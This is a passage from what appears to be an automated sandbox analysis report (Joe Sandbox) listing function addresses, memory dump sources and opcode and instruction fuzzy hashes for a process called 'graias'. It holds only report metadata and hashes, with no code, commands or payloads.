                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC11E371E102149FEFA0EB64CC45BED73B2EF84720F104664E569DB2D1DB709846CB40
                                                                                                                                                                                                                                            Function 06D09DCC Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f850598d729b761ff5cdbc0f044b6d691d3ac6988d229b107d5b951d1cc19642
                                                                                                                                                                                                                                            • Instruction ID: faffdb29a1d482b3f80c519f5dd8175a3f178c79268f7c6916f833c7e8a64967
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f850598d729b761ff5cdbc0f044b6d691d3ac6988d229b107d5b951d1cc19642
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A11C631B506159FEBA0EB68CC45BED73B1EF84710F104A64E559DB2D0DB70A945CB90
                                                                                                                                                                                                                                            Function 00B9D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1706529896.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_b9d000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                                                                                                                                            • Instruction ID: 57d303b7f535a0f0f25ae9db9955154d31fea1fa388332d23fe72a5ccbd5c2f6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7211CD72504240CFCF12CF10D5C0B16BFA2FB94324F2482A9D8090B756C33AE85ACBA1
                                                                                                                                                                                                                                            Function 00BAD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1709815713.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_bad000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                                                                                                            • Instruction ID: e2a13504f049e0e0a69cb94487b2ec826d806b3a27e806981fbebfd4b54519af
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86118B75508380DFDB16CF14D5C4B15BBA2FB85314F24C6AAD84A4BAA6C33AD84ACB61
                                                                                                                                                                                                                                            Function 06D01030 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f265ae0c9eda0157629a8c0d2bc98995d2215090ca8f6bc9d8b0627daa2ba850
                                                                                                                                                                                                                                            • Instruction ID: cfd72e11be20b95f036449cc8563ec31317f9970e899d2e7a8aff1908a665a8b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f265ae0c9eda0157629a8c0d2bc98995d2215090ca8f6bc9d8b0627daa2ba850
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F119130205705CFE7A49B79D858BA673A5FF44720F108A6DE09AC72E0CF70A845CB90
                                                                                                                                                                                                                                            Function 06D01EF0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 60f20fbc2fa59b413d3295c88db766be41df320b951c44d56eec2812003cd084
                                                                                                                                                                                                                                            • Instruction ID: 85210f33e358a7132747765c43e41a2c3f451ed816f0a1863c145265245e64c9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60f20fbc2fa59b413d3295c88db766be41df320b951c44d56eec2812003cd084
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C11A5336102028FE354CB64C840BA5BBE9FF4A361F184666E096C72E1C334E851CB50
                                                                                                                                                                                                                                            Function 06D05FA0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 331a667a47479d6254f4790c7552dd8545648886594d5e2a0cd2166d94f3338d
                                                                                                                                                                                                                                            • Instruction ID: a3665bc9d695694bbd5239a03286e150bbd45637a08aceabb98fb0e7507c647c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 331a667a47479d6254f4790c7552dd8545648886594d5e2a0cd2166d94f3338d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E501A2357141014FDB55A73D855863E3BD7EFC8755719006AD506CB3A1DF25DC028B91
                                                                                                                                                                                                                                            Function 06D01EE0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 90189250490bd9df88c1eedf70263f2e5ada73fb66ada281b4cac5a8c3e1b15b
                                                                                                                                                                                                                                            • Instruction ID: acb6c728b9cfad4eda3071f13ae116c912931b12fa21a768c403b85513513082
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90189250490bd9df88c1eedf70263f2e5ada73fb66ada281b4cac5a8c3e1b15b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9311A1366043528FE7598B64C8507F57FF9AF46340F0845AAE086CB1A2C335D985C790
                                                                                                                                                                                                                                            Function 06D0D491 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 06f6411a71381877e8f44cef287b7c300725576cd6493088453eb2ec93038df4
                                                                                                                                                                                                                                            • Instruction ID: 819278f82a059ccf7dbaba15267f59e0ec1394ac4d6a40b6db4e787970c07446
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06f6411a71381877e8f44cef287b7c300725576cd6493088453eb2ec93038df4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11016836A002989FDF519FA848001FE3FA2EF06314B044567E955D72C2D634CE11CBA2
                                                                                                                                                                                                                                            Function 06D08888 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 7d2c045af1d8d64329b4da7cfb6b188f13b224a3d5aea74625ddb1d5c83df225
                                                                                                                                                                                                                                            • Instruction ID: 22fe1d710b07ada3148d58e83e9e8afe96654ba804ed409b21a7a21e6e03ff21
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d2c045af1d8d64329b4da7cfb6b188f13b224a3d5aea74625ddb1d5c83df225
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4301F1357083908FDB259F39E940929BBF5EF9221530804BEE045CF2B2DA31DC95DB21
                                                                                                                                                                                                                                            Function 06D0CEB0 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: cd520be270a3f8de98e977a0ab63b0984db61aa3a3dbff9a873148fc193b5c33
                                                                                                                                                                                                                                            • Instruction ID: a30eaa6dfa112d3d4fc53312871a2552d3b0a715d5e56264ba0153621c1f3c28
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd520be270a3f8de98e977a0ab63b0984db61aa3a3dbff9a873148fc193b5c33
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F911D2716053458FD764CF78D884B9ABBB4FF48324F10466EE468C73A1DB70A841CBA0
                                                                                                                                                                                                                                            Function 06D09DDC Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 954289fda19872f94d756fa523a118f61e50c68acceb63001eb045822e1bbeca
                                                                                                                                                                                                                                            • Instruction ID: 0c5b03d048f59ffd8e7c57ad21c4cf0264b303084ab341c3de03abd1b3a1710a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 954289fda19872f94d756fa523a118f61e50c68acceb63001eb045822e1bbeca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D0192706107058FE7648F68D884B5A7BE4FB44324F104A29E569C73E0DF70D845CB91
                                                                                                                                                                                                                                            Function 06D0DB80 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bc0629cf624bd71d0400a8976bf9be0462dfdae97d0edfc1287d938dc3ab74ec
                                                                                                                                                                                                                                            • Instruction ID: 545185a1602b3eff2dc195dbdf751d7ed21a19660099a0c211ea3dbb044e377d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc0629cf624bd71d0400a8976bf9be0462dfdae97d0edfc1287d938dc3ab74ec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6101F572A042095FE7649B5CE8817AABBE2EF94310F14453AE509CB351DB70DC41C790
                                                                                                                                                                                                                                            Function 06D01F98 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5f9f480b59b424612b44e80f2c7883c482d0dd7631111aefc65202ac4819c2c8
                                                                                                                                                                                                                                            • Instruction ID: 3d58689482d407e084e8613e3de8de1c73f9fec55defc856967f43dd3f2b35ce
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f9f480b59b424612b44e80f2c7883c482d0dd7631111aefc65202ac4819c2c8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2401A7316047008FEB64D7A9C951B5AB3E9EF85354F54C83EE849C72D8CB70E946C791
                                                                                                                                                                                                                                            Function 06D01F88 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 91c79aadb7c8c9e6674377b2872f2ceb5e1674ea0b22c5467de56e604cb0afec
                                                                                                                                                                                                                                            • Instruction ID: de061590a2bf4674e115a2fd468b25deb8545ca9fba08f6fb8dcbd8a5fb742fa
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91c79aadb7c8c9e6674377b2872f2ceb5e1674ea0b22c5467de56e604cb0afec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC0128316097008FEB65D7A9C951B2AB7E5EF85310F14C86EE445C72D9CB70EA46C790
                                                                                                                                                                                                                                            Function 06D02660 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d1a392668d8066f18fbe81d728c0ddf990c8a2464eaeb29a5a6e6b87c61d6fe3
                                                                                                                                                                                                                                            • Instruction ID: 1a798f0b645b13141faf4380f97de69c9c0dae019df483d09bd59df1f28732d5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1a392668d8066f18fbe81d728c0ddf990c8a2464eaeb29a5a6e6b87c61d6fe3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68012B329073559FC3155728E4496AAFFE4EF82710F0900EBE009CF192CB119944C7E1
                                                                                                                                                                                                                                            Function 06D05F91 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: b5b911dbc6cb3ba858506002652e2b2152e4c7e023ea9b5d83018da3c49ad2ff
                                                                                                                                                                                                                                            • Instruction ID: 76d1943ee7c6687be60a17f1df2fbb52bf4a32d0f5077e1241f7bb9a3b77b2c9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5b911dbc6cb3ba858506002652e2b2152e4c7e023ea9b5d83018da3c49ad2ff
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA01F4313440004FC715A73D9468ABE3BE7EFC921471900AAE906CB392CE25CC03DB91
                                                                                                                                                                                                                                            Function 06D0F9A0 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3aed15d022c8f5b3267d6eb89925c54cff6fd0e51a7c73088ce37baef4199617
                                                                                                                                                                                                                                            • Instruction ID: e57c5797833c97b95e520d4c349bccb69ce6ea5c08f7e706d16163b6a95b7559
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3aed15d022c8f5b3267d6eb89925c54cff6fd0e51a7c73088ce37baef4199617
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1012631608345AFEB35CFA9E40076ABBF49F41214F2884AEDC85CB6E2D771E940C791
                                                                                                                                                                                                                                            Function 06D0F9B0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8c014fe3b961294b47ac65a0ae258e99b2e22be8104f42715e48a84f4e68f808
                                                                                                                                                                                                                                            • Instruction ID: 4bce90f045f2832d29e546cb6bac19dd226fe62d5440779b2769dcfc76a12e4e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c014fe3b961294b47ac65a0ae258e99b2e22be8104f42715e48a84f4e68f808
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3F0C231604704ABFF78CF5AE440B6AB7E5EF44314F20492DD84A8B6E0DB71E981CB90
                                                                                                                                                                                                                                            Function 06D09138 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 68cfcf72a62d60300b833a5bba9f2a90dc77fc611c77d6930276b28271ceb129
                                                                                                                                                                                                                                            • Instruction ID: f98e668a75c201b7169a284b18b3a381bdc3525534a409fa1b70a3b925cae182
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68cfcf72a62d60300b833a5bba9f2a90dc77fc611c77d6930276b28271ceb129
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59F0F672B041004FE3B4AB39CC90BBA77AAEBC0651F055469D162CB292EE70DC01C752
                                                                                                                                                                                                                                            Function 06D045F8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f580288d091c99f0d276cd7a76684685f7c97e8415a2872463290b0e6c59a8b0
                                                                                                                                                                                                                                            • Instruction ID: 41220430cb11ee9292088477a18f85af55a571afb7b51c8ff0f76c1d752ed8c0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f580288d091c99f0d276cd7a76684685f7c97e8415a2872463290b0e6c59a8b0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9701F639B00500CF9B59CF29D584D98B7F2FF88311B9540A9D505DB6A1DB31EC85CF90
                                                                                                                                                                                                                                            Function 06D09148 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: fe05a3d4380715ee44b1b801145d782a386a7d330c9ba1ab4d2a28e70ca1016c
                                                                                                                                                                                                                                            • Instruction ID: 5585931a978895cd7b047b6160f141a04b3880639dfdf2c67710e482b86923fe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe05a3d4380715ee44b1b801145d782a386a7d330c9ba1ab4d2a28e70ca1016c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAF0B4317141048FE6A4AA39C85476A73DAEBC0261F05546DD226CF391DE70DD41D392
                                                                                                                                                                                                                                            Function 06D02020 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 15f3c8b91ae7e37b7d46fd25b18e921bf3df3f38a769c5571e669c9a1cbf3584
                                                                                                                                                                                                                                            • Instruction ID: ab51e24f8861b51e2482a5233f9a333dd04a574f489acd55ca0ccfe1514eb9e7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15f3c8b91ae7e37b7d46fd25b18e921bf3df3f38a769c5571e669c9a1cbf3584
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF0A4306047098FE7559B7AD864BA577A4AF41710F0146AEE495CB2F1CB70E841D7A0
                                                                                                                                                                                                                                            Function 06D0482C Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ae57eecd0acaccdfbbd2ef85f13ac3817e5d64ecf6bd074887c104a2e8e65ad1
                                                                                                                                                                                                                                            • Instruction ID: c648174abe5e2d7d239ae6cb361393c7ad23221b048861d8cbd93de49e610a08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae57eecd0acaccdfbbd2ef85f13ac3817e5d64ecf6bd074887c104a2e8e65ad1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26F09779B485608FC7022378446807E7FE2EBCA25230404C9C382C7281DF18A523C3C1
                                                                                                                                                                                                                                            Function 06D0D9CA Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5b560482f7df1ae8c53d2aa99bb3ee0a8fe99c6eb0ef676f992c6cc145b6cf3e
                                                                                                                                                                                                                                            • Instruction ID: 93fdba3f3c08f9d670eb9c45f106b08922d8e4d42374752565feeb742afd4332
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b560482f7df1ae8c53d2aa99bb3ee0a8fe99c6eb0ef676f992c6cc145b6cf3e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04011935A00219CFDB04DF68D884B9CB7B1FF48310F1086AAE159AB3A1CB34AC41CFA0
                                                                                                                                                                                                                                            Function 06D046B1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
